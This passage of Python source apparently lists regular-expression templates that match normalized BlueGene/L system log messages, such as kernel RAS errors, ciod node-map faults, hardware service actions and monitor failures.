r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL {torus_retransmission_corrected}$".format( torus_retransmission_corrected=torus_retransmission_corrected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? ddr error\(s\) detected and corrected on rank .+?, symbol .+? over .+? seconds$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? L3 directory error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? L3 EDRAM error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? microseconds spent in the rbs signal handler during .+? calls. .+? microseconds was the maximum time for a single instance of a correctable ddr.$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus non-crc error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus processor sram injection error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus processor sram reception error\(s\) \(dcr 0x02fc\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus receiver sram ecc error\(s\) \(dcr 0x.+?\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus sender .+? retransmission error\(s\) \(dcr 0x.+\) detected and corrected over .+? seconds$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4address=ip4address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? torus sender sram ecc error\(s\) \(dcr .+?\) detected and corrected$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO .+? total interrupts. .+? critical input interrupts. .+? microseconds total spent on critical input interrupts, .+? microseconds max time in a critical input interrupt.$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO \d+? floating point alignment exceptions$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO \d+? torus non-crc error\(s\) \(dcr 0x02fd\) detected and corrected$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO auxiliary processor.........................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO byte ordering exception.....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: duplicate canonical-rank \d+? to logical-rank \d mapping at line \d of node map file /.+?$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Error opening node map file .+?, No such file or directory$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: for node .+?, incomplete data written to core file core.+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: generated \d+? core files for program .+?$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: In packet from node .+? \({nodeid}\), message still ready for node .+? \(softheader=.+?\)$".format(nodeid=nodeid,hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: In packet from node \d+?.\d \({nodeid}\), message code \d is not \d or 4294967295 \(softheader={eight_hex} {eight_hex} {eight_hex} {eight_hex}\)$".format(nodeid=nodeid, eight_hex=eight_hex),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Missing or invalid fields on line \d+? of node map file /.+?$".format( eight_hex=eight_hex),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: pollControlDescriptors: Detected the debugger died\.$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Received signal .+?, code=.+?, errno=.+?, address={hex_address}$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: sendMsgToDebugger: error sending PROGRAM_EXITED message to debugger.$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ciod: Unexpected eof at line \d+? of node map file .+?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO core configuration register: {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO critical input interrupt \(unit=0x.+? bit=0x.+?\): warning for .+? wire, suppressing further interrupts of same type$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO critical input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO critical input interrupt {unit_id}: warning for .+? wire$".format( unit_id=unit_id),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data address space................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data cache flush parity error detected. attempting to correct$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data cache search parity error detected. attempting to correct$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data storage interrupt$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO data store interrupt caused by \w+?.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ddr: activating redundant bit steering for next allocation: rank=.+? symbol=.+?$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO ddr: Suppressing further CE interrupts$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO debug interrupt enable............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO debug wait enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO disable apu instruction broadcast........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO disable store gathering..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO disable trace broadcast..................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO e error threshold, consider replacing the card$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO e?rror threshold, consider replacing the card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO exception syndrome register: {hex_address}$".format( hex_address=hex_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO external input interrupt \(unit=0x.+? bit=0x.+?\): .+? tree receiver .+? in resynch mode$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO external input interrupt \(unit=0x.+? bit=0x.+?\): number of corrected SRAM errors has exceeded threshold.*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO external input interrupt enable...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO floating point instr. enabled.....[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO floating point operation....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO floating pt ex mode \d enable......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO force load/store alignment...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO general purpose registers:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO guaranteed data cache block touch........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO guaranteed instruction cache block touch.[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO iar {eight_hex} dear {eight_hex}$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO icache prefetch depth....................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO icache prefetch threshold................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO instruction address space.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO instruction cache parity error corrected$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO Kernel detected .+? integer alignment exceptions.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO L1 DCACHE summary averages: #ofDirtyLines: .+? out of .+? #ofDirtyDblWord: .+? out of .+?$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO L3 correctable errors exceeds threshold \(iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO MACHINE CHECK DCR read timeout \(mc=.+? iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO machine check enable..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO MACHINE CHECK PLB write IRQ \(mc=.+? iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO machine check: i-fetch......................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO Microloader Assertion$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO NFS Mount failed on .+?, slept .+? seconds, retrying \(.+?\)$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO problem state \(0=sup,1=usr\).......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: fp compare...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: fp cr field .............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: fp cr update.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: illegal instruction......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: imprecise exception......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: privileged instruction...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: trap instruction.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: unimplemented operation..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO shutdown complete$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO special purpose registers:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO SRAM correctable errors exceeds threshold \(iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO store operation.............................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO suppressing further interrupts of same type$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO total of .+? ddr error\(s\) detected and corrected over .+? seconds$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO wait state enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ce_sym}$".format( ce_sym = ce_sym),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_message_code}$".format( ciod_message_code=ciod_message_code),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_read_continuation}$".format( ciod_read_continuation=ciod_read_continuation),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_unrecognized_message}$".format( ciod_unrecognized_message=ciod_unrecognized_message),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_xcoordinate_exceeded}$".format( ciod_xcoordinate_exceeded=ciod_xcoordinate_exceeded),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {data_address}$".format( data_address=data_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_error_detected_on_rank}$".format( ddr_error_detected_on_rank = ddr_error_detected_on_rank),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_redundant_bit_steering}$".format( ddr_redundant_bit_steering = ddr_redundant_bit_steering),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_unable_to_steer_rank}$".format( ddr_unable_to_steer_rank=ddr_unable_to_steer_rank),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {double_hummer_exceptions}$".format( double_hummer_exceptions = double_hummer_exceptions),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {general_purpose_registers}$".format( general_purpose_registers=general_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {generating_core}$".format( generating_core=generating_core),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {instruction_address}$".format( instruction_address=instruction_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {l3_directory_errors_detected}$".format( l3_directory_errors_detected=l3_directory_errors_detected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {l3_edram_error}$".format( l3_edram_error = l3_edram_error),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {special_purpose_registers}$".format( special_purpose_registers=special_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {torus_reciever_error}$".format( torus_reciever_error=torus_reciever_error),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {torus_sender_corrected}$".format( torus_sender_corrected=torus_sender_corrected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {torus_sram_repetition}$".format( torus_sram_repetition=torus_sram_repetition),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {total_ddr_errors}$".format( total_ddr_errors = total_ddr_errors),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {tree_receiver_detected}$".format( tree_receiver_detected = tree_receiver_detected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO.+? torus receiver sram ecc error\(s\) \(dcr 0x.+?\) detected and corrected$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD INFO MidplaneSwitchController performing bit sparing on {nodeid2} bit \d+?$".format(nodeid2=nodeid2, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL DISCOVERY ERROR Found invalid node ecid in processor card slot J\d+?, ecid {hexchar}+?$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
# - TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL DISCOVERY ERROR Node card status: no ALERTs are active. Clock Mode is Low. Clock Select is Midplane. Phy JTAG Reset is asserted. ASIC JTAG Reset is asserted. Temperature Mask is not active. No temperature error. Temperature Limit Error Latch is clear. PGOOD IS NOT ASSERTED. PGOOD ERROR LATCH IS ACTIVE. MPGOOD IS NOT OK. MPGOOD ERROR LATCH IS ACTIVE. The 2.5 volt rail is OK. The 1.5 volt rail is OK.
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY ERROR Node card status: .+?active\. Clock Mode.*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL DISCOVERY SEVERE Problem reading the ethernet arl entries fro the service card: java.lang.IllegalStateException: while executing I2C Operation caught java.lang.RuntimeException: Communication error: \(DirectIDo for com.ibm.ido.DirectIDo object \[{LP_ADDRESS}\@/{ip4andport} with image version 9 and card type 2\] is in state = COMMUNICATION_ERROR, sequenceNumberIsOk = false, ExpectedSequenceNumber = .+?, Reply Sequence Number = .+?, timedOut = true, retries = 200, timeout = 1000, Expected Op Command = .+?, Actual Op Reply = .+?, Expected Sync Command = .+?, Actual Sync Reply = .+?\)$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE SEVERE NodeCard power module U\d\d is not accessible$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING EndServiceAction \d+?.*? performed upon {nodeid3} by .+?$".format( nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING EndServiceAction is restarting the (Link cards|LinkCards) in [mM]idplane {nodeid3} as part of Service Action \d+?$".format(nodeid3=nodeid3, hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING PrepareForService is being done on this Midplane \(mLctn\({nodeid3}\), mCardSernum\(.+?\), iWhichCardsToPwrOff\(.+?\)\) by .+?$".format(hex_address=hex_address, eight_hex=eight_hex, nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING PrepareForService shutting down (LinkCard|Link card)\(mLctn\({nodeid3}\), mCardSernum\(\w+?\), mLp\({LP_ADDRESS}\), mIp\({ip4address}\), mType\(.*?\)\) as part of Service Action \d+?$".format( nodeid3=nodeid3, LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING PrepareForService shutting down Node card\(mLctn\({nodeid3}\), mCardSernum\(.+?\), mLp\({hexcharcol}+?\), mIp\({ip4address}\), mType\(.+?\)\) as part of Service Action .+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4address=ip4address, eight_hex=eight_hex, nodeid3=nodeid3, ),
# - TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction is restarting the NodeCards in midplane R33-M1 as part of Service Action 219
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL HARDWARE WARNING EndServiceAction is restarting the (NodeCards|Node cards) in midplane {nodeid3} as part of Service Action \d+?$".format(nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {hardware_warning_shutdown}$".format( hardware_warning_shutdown= hardware_warning_shutdown),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {hardware_warning}$".format( hardware_warning= hardware_warning),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {prepare_for_service_on_this_part}$".format( prepare_for_service_on_this_part=prepare_for_service_on_this_part),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE (Hardware )?monitor caught java.lang.IllegalStateException: while executing .+? Operation caught java.net.SocketException: Broken pipe and is stopping$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE (Hardware )?monitor caught java.net.SocketException: Broken pipe and is stopping$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE Link PGOOD error latched on link card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE Local PGOOD error latched on link card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE Temperature Over Limit on link card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE While reading FanModule caught java.lang.IllegalStateException: while executing I2C Operation .*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE While setting fan speed caught java.lang.IllegalStateException: while executing I2C Operation .*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR SEVERE Hardware monitor caught java.net.SocketException: Broken pipe and is stopping$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE idoproxy exited normally with exit code 0$".format( ),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER INFO BGLMaster has been started: ./BGLMaster --consoleip 127.0.0.1 --consoleport 32035 --configfile bglmaster.init.*?$",
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS ERROR Ido packet timeout$",
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS INFO {ciodb_has_been_restarted}$".format( ciodb_has_been_restarted=ciodb_has_been_restarted),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS INFO {ido_proxy_has_been_started}$".format( ido_proxy_has_been_started = ido_proxy_has_been_started),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS INFO {mmcs_db_server_started}$".format( mmcs_db_server_started=mmcs_db_server_started),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL CMCS INFO Controlling BG/L rows \[( \d)+ \]$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL CMCS INFO Running as background command$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL CMCS INFO Starting SystemController$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY INFO {ido_chipstatus_changed}$".format( ido_chipstatus_changed=ido_chipstatus_changed),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY SEVERE Error getting detailed hw info for node, caught java.io.IOException: .*?$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY SEVERE {bgl_ido_chip_table}$".format( bgl_ido_chip_table=bgl_ido_chip_table),
